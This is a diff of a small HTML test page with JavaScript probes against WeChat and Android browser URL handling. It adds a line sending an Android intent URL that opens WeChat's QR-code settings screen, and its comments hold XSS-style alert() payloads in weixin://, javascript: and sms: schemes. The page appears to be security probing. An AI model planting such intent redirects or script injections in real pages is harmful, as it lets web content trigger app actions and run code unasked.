--- a/int.html
+++ b/int.html
@@ -1,5 +1,5 @@
 <script>
-  // location.href="intent:#Intent;component=com.tencent.mm/com.tencent.mm.plugin.setting.ui.setting.SelfQRCodeUI;package=com.tencent.mm;action=android.intent.action.VIEW;category=android.intent.category.DEFAULT;scheme=http;end;";
+  
 
   //location.href="weixin://openapi/openwebview/result?appId=alert(3)";
   //top.location="http://google.com";
@@ -7,6 +7,7 @@
   window.alert(window.location.origin);
   // location.href="sms:\\127.0.0.1\\body=window.alert(2)";
   // window.open('javascript:alert("XSS in doc.domain: "+document.domain+", win.origin: "+window.location.origin)');
+  window.location.origin="intent:#Intent;component=com.tencent.mm/com.tencent.mm.plugin.setting.ui.setting.SelfQRCodeUI;package=com.tencent.mm;action=android.intent.action.VIEW;category=android.intent.category.DEFAULT;scheme=http;end;";
 
   </script>
 
